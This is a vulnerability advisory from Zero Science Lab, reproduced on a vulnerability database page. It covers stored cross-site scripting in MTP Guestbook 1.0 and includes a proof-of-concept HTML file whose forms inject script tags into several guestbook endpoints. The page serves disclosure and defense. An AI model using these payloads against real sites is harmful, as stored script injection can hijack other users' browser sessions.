Lucene search
K

MTP Guestbook 1.0 Multiple Remote Script Insertion Vulnerabilities

🗓️ 25 Feb 2013 00:00:00Reported by Gjoko KrsticType 
zeroscience
 zeroscience
🔗 www.zeroscience.mk👁 23 Views

MTP Guestbook 1.0 Cross-Site Scripting Vulnerabilitie

Code
<!--

MTP Guestbook 1.0 Multiple Remote Script Insertion Vulnerabilities


Vendor: MTP Scripts
Product web page: http://www.morephp.net
Affected version: 1.0

Summary: MTP Guestbook allows you to put a guestbook on your website.
Your visitors can sign it and leave a message. The entries can be edited
and deleted in the admin area.

Desc: MTP Guestbook script suffers from multiple stored cross-site scripting
vulnerabilities. The issues are triggered when input passed via several
parameters to several scripts is not properly sanitized before being returned
to the user. This can be exploited to execute arbitrary HTML and script code
in a user's browser session in context of an affected site.

Tested on: Linux, Apache2


Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
                            @zeroscience


Advisory ID: ZSL-2013-5131
Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2013-5131.php


17.02.2013

--><html>
<head>
<title>MTP Guestbook 1.0 Multiple Remote Script Insertion Vulnerabilities</title>
</head>
<body><center>
<form action="http://localhost/mtp_guestbook/blocked.php" method="POST">
<input name="simbol" type="hidden" value='"&gt;&lt;script&gt;alert(1);&lt;/script&gt;'/>
<input name="action" type="hidden" value="add"/>
<input type="submit" value="XSS #1"/>
</form>
<br/><br/>
<form action="http://localhost/mtp_guestbook/insert_user.php" method="POST">
<input name="ins_city" type="hidden" value='"&gt;&lt;script&gt;alert(2);&lt;/script&gt;'/>
<input name="ins_country" type="hidden" value="MK"/>
<input name="ins_email" type="hidden" value="[email protected]"/>
<input name="ins_fname" type="hidden" value='"&gt;&lt;script&gt;alert(3);&lt;/script&gt;'/>
<input name="ins_pass" type="hidden" value="thricerpass"/>
<input name="ins_username" type="hidden" value="thricer"/>
<input type="submit" value="XSS #2"/>
</form>
<br/><br/>
<form action="http://localhost/mtp_guestbook/ajax_cat_ins.php" method="POST">
<input name="name" type="hidden" value='"&gt;&lt;script&gt;alert(4);&lt;/script&gt;'/>
<input type="submit" value="XSS #3"/>
</form>
</center></body>
</html>

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation